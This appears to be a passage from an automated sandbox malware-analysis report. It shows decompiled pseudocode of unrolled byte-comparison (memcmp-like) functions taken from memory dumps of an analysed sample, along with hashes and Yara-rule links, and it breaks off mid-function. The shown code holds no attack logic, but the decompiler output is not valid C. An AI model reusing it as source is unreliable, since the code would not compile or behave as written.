				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x001b0113
0x001b0113
0x001b0119
0x001b01a0
0x001b01a2
0x001b01a4
0x00000000
0x00000000
0x001b01aa
0x001b01b0
0x001b0237
0x001b0239
0x001b023b
0x00000000
0x00000000
0x001b0241
0x001b0247
0x001b02ce
0x001b02d0
0x001b02d2
0x00000000
0x00000000
0x001b02d8
0x001b02de
0x001b0365
0x001b0367
0x001b0369
0x00000000
0x00000000
0x001b036f
0x001b0375
0x001b03fc
0x001b03fe
0x001b0400
0x00000000
0x00000000
0x001b040c
0x001b0494
0x001b0496
0x001b0498
0x00000000
0x00000000
0x001b049e
0x001b04a4
0x001b052b
0x001b052d
0x001b052f
0x001b052f
0x00000000
0x001b052f
0x001b04b1
0x001b04b3
0x001b04cb
0x001b04d3
0x001b04d5
0x001b04ed
0x001b04f5
0x001b04f7
0x001b050f
0x001b0517
0x001b0519
0x001b0522
0x001b0522
0x00000000
0x001b0519
0x001b0500
0x001b0509
0x00000000
0x00000000
0x00000000
0x001b0509
0x001b04de
0x001b04e7
0x00000000
0x00000000
0x00000000
0x001b04e7
0x001b04bc
0x001b04c5
0x00000000
0x00000000
0x00000000
0x001b04c5
0x001b041a
0x001b041c
0x001b0434
0x001b043c
0x001b043e
0x001b0456
0x001b045e
0x001b0460
0x001b0478
0x001b0480
0x001b0482
0x001b048b
0x001b048b
0x00000000
0x001b0482
0x001b0469
0x001b0472
0x00000000
0x00000000
0x00000000
0x001b0472
0x001b0447
0x001b0450
0x00000000
0x00000000
0x00000000
0x001b0450
0x001b0425
0x001b042e
0x00000000
0x00000000
0x00000000
0x001b042e
0x001b0382
0x001b0384
0x001b039c
0x001b03a4
0x001b03a6
0x001b03be
0x001b03c6
0x001b03c8
0x001b03e0
0x001b03e8
0x001b03ea
0x001b03f3
0x001b03f3
0x00000000
0x001b03ea
0x001b03d1
0x001b03da
0x00000000
0x00000000
0x00000000
0x001b03da
0x001b03af
0x001b03b8
0x00000000
0x00000000
0x00000000
0x001b03b8
0x001b038d
0x001b0396
0x00000000
0x00000000
0x00000000
0x001b0396
0x001b02eb
0x001b02ed
0x001b0305
0x001b030d
0x001b030f
0x001b0327
0x001b032f
0x001b0331
0x001b0349
0x001b0351
0x001b0353
0x001b035c
0x001b035c
0x00000000
0x001b0353
0x001b033a
0x001b0343
0x00000000
0x00000000
0x00000000
0x001b0343
0x001b0318
0x001b0321
0x00000000
0x00000000
0x00000000
0x001b0321
0x001b02f6
0x001b02ff
0x00000000
0x00000000
0x00000000
0x001b02ff
0x001b0254
0x001b0256
0x001b026e
0x001b0276
0x001b0278
0x001b0290
0x001b0298
0x001b029a
0x001b02b2
0x001b02ba
0x001b02bc
0x001b02c5
0x001b02c5
0x00000000
0x001b02bc
0x001b02a3
0x001b02ac
0x00000000
0x00000000
0x00000000
0x001b02ac
0x001b0281
0x001b028a
0x00000000
0x00000000
0x00000000
0x001b028a
0x001b025f
0x001b0268
0x00000000
0x00000000
0x00000000
0x001b0268
0x001b01bd
0x001b01bf
0x001b01d7
0x001b01df
0x001b01e1
0x001b01f9
0x001b0201
0x001b0203
0x001b021b
0x001b0223
0x001b0225
0x001b022e
0x001b022e
0x00000000
0x001b0225
0x001b020c
0x001b0215
0x00000000
0x00000000
0x00000000
0x001b0215
0x001b01ea
0x001b01f3
0x00000000
0x00000000
0x00000000
0x001b01f3
0x001b01c8
0x001b01d1
0x00000000
0x00000000
0x00000000
0x001b011f
0x001b011f
0x001b0126
0x001b0128
0x001b0140
0x001b0140
0x001b0148
0x001b014a
0x001b0162
0x001b0162
0x001b016a
0x001b016c
0x001b0184
0x001b0184
0x001b018c
0x001b018e
0x001b0197
0x001b0197
0x00000000
0x001b018e
0x001b0172
0x001b0175
0x001b017e
0x001afcd6
0x001afcd6
0x001b0ac7
0x001b0ac7
0x00000000
0x001b017e
0x001b0150
0x001b0153
0x001b015c
0x00000000
0x00000000
0x00000000
0x001b015c
0x001b012e
0x001b0131
0x001b013a
0x00000000
0x00000000
0x00000000
0x001b013a

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: e63e8a81c225657b4e69614beffdd4fbcbfec59aed143588e75a52a2497e0bf9
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 30C1C3762050970ADF2E463A857447FBBE16AA27B131A076DE8B3CB0D4FF20C569D620

Uniqueness

Uniqueness Score: -1.00%

Function 001B0548, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001B0548(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x001b0548
0x001b0548
0x001b054e
0x001b05d6
0x001b05d8
0x001b05da
0x00000000
0x00000000
0x001b05e0
0x001b05e6
0x001b066d
0x001b066f
0x001b0671
0x00000000
0x00000000
0x001b0677
0x001b067d
0x001b0704
0x001b0706
0x001b0708
0x00000000
0x00000000
0x001b070e
0x001b0714
0x001b079b
0x001b079d
0x001b079f
0x00000000
0x00000000
0x001b07ab
0x001b0833
0x001b0835
0x001b0837
0x00000000
0x00000000
0x001b083d
0x001b0843
0x001b08ca
0x001b08cc
0x001b08ce
0x00000000
0x00000000
0x001b08d4
0x001b08da
0x001b0961
0x001b0963
0x001b0965
0x00000000
0x00000000
0x001b0973
0x001b0975
0x001b098d
0x001b0995
0x001b0997
0x001b00f0
0x001b00f8
0x001b00fa
0x001b0107
0x001b0107
0x00000000
0x001b00fa
0x001b09a4
0x001b00ea
0x00000000
0x00000000
0x00000000
0x00000000
0x001b00ea
0x001b097e
0x001b0987
0x00000000
0x00000000
0x00000000
0x001b0987
0x001b08e7
0x001b08e9
0x001b0901
0x001b0909
0x001b090b
0x001b0923
0x001b092b
0x001b092d
0x001b0945
0x001b094d
0x001b094f
0x001b0958
0x001b0958
0x00000000
0x001b094f
0x001b0936
0x001b093f
0x00000000
0x00000000
0x00000000
0x001b093f
0x001b0914
0x001b091d
0x00000000
0x00000000
0x00000000
0x001b091d
0x001b08f2
0x001b08fb
0x00000000
0x00000000
0x00000000
0x001b08fb
0x001b0850
0x001b0852
0x001b086a
0x001b0872
0x001b0874
0x001b088c
0x001b0894
0x001b0896
0x001b08ae
0x001b08b6
0x001b08b8
0x001b08c1
0x001b08c1
0x00000000
0x001b08b8
0x001b089f
0x001b08a8
0x00000000
0x00000000
0x00000000
0x001b08a8
0x001b087d
0x001b0886
0x00000000
0x00000000
0x00000000
0x001b0886
0x001b085b
0x001b0864
0x00000000
0x00000000
0x00000000
0x001b0864
0x001b07b9
0x001b07bb
0x001b07d3
0x001b07db
0x001b07dd
0x001b07f5
0x001b07fd
0x001b07ff
0x001b0817
0x001b081f
0x001b0821
0x001b082a
0x001b082a
0x00000000
0x001b0821
0x001b0808
0x001b0811
0x00000000
0x00000000
0x00000000
0x001b0811
0x001b07e6
0x001b07ef
0x00000000
0x00000000
0x00000000
0x001b07ef
0x001b07c4
0x001b07cd
0x00000000
0x00000000
0x00000000
0x001b07cd
0x001b0721
0x001b0723
0x001b073b
0x001b0743
0x001b0745
0x001b075d
0x001b0765
0x001b0767
0x001b077f
0x001b0787
0x001b0789
0x001b0792
0x001b0792
0x00000000
0x001b0789
0x001b0770
0x001b0779
0x00000000
0x00000000
0x00000000
0x001b0779
0x001b074e
0x001b0757
0x00000000
0x00000000
0x00000000
0x001b0757
0x001b072c
0x001b0735
0x00000000
0x00000000
0x00000000
0x001b0735
0x001b068a
0x001b068c
0x001b06a4
0x001b06ac
0x001b06ae
0x001b06c6
0x001b06ce
0x001b06d0
0x001b06e8
0x001b06f0
0x001b06f2
0x001b06fb
0x001b06fb
0x00000000
0x001b06f2
0x001b06d9
0x001b06e2
0x00000000
0x00000000
0x00000000
0x001b06e2
0x001b06b7
0x001b06c0
0x00000000
0x00000000
0x00000000
0x001b06c0
0x001b0695
0x001b069e
0x00000000
0x00000000
0x00000000
0x001b069e
0x001b05f3
0x001b05f5
0x001b060d
0x001b0615
0x001b0617
0x001b062f
0x001b0637
0x001b0639
0x001b0651
0x001b0659
0x001b065b
0x001b0664
0x001b0664
0x00000000
0x001b065b
0x001b0642
0x001b064b
0x00000000
0x00000000
0x00000000
0x001b064b
0x001b0620
0x001b0629
0x00000000
0x00000000
0x00000000
0x001b0629
0x001b05fe
0x001b0607
0x00000000
0x00000000
0x00000000
0x001b0554
0x001b0558
0x001b055c
0x001b055e
0x001b0576
0x001b0576
0x001b057e
0x001b0580
0x001b0598
0x001b0598
0x001b05a0
0x001b05a2
0x001b05ba
0x001b05ba
0x001b05c2
0x001b05c4
0x001b05cd
0x001b05cd
0x00000000
0x001b05c4
0x001b05a8
0x001b05ab
0x001b05b4
0x00000000
0x00000000
0x00000000
0x001b05b4
0x001b0586
0x001b0589
0x001b0592
0x00000000
0x00000000
0x00000000
0x001b0592
0x001b0564
0x001b0567
0x001b0570
0x00000000
0x00000000
0x00000000
0x001b0570
0x001afcd6
0x001afcd6
0x001b0ac7

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: aa3aa7a285b6d89873801956c610c6dfc9d18e776636feb53d94ead1e243761e
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: C9C1C4762051970ADF2E463AC57447FFBA16EA27B131A076DE8B2CB0D4FF20C529D620

Uniqueness

Uniqueness Score: -1.00%

Function 001AFCDE, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001AFCDE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
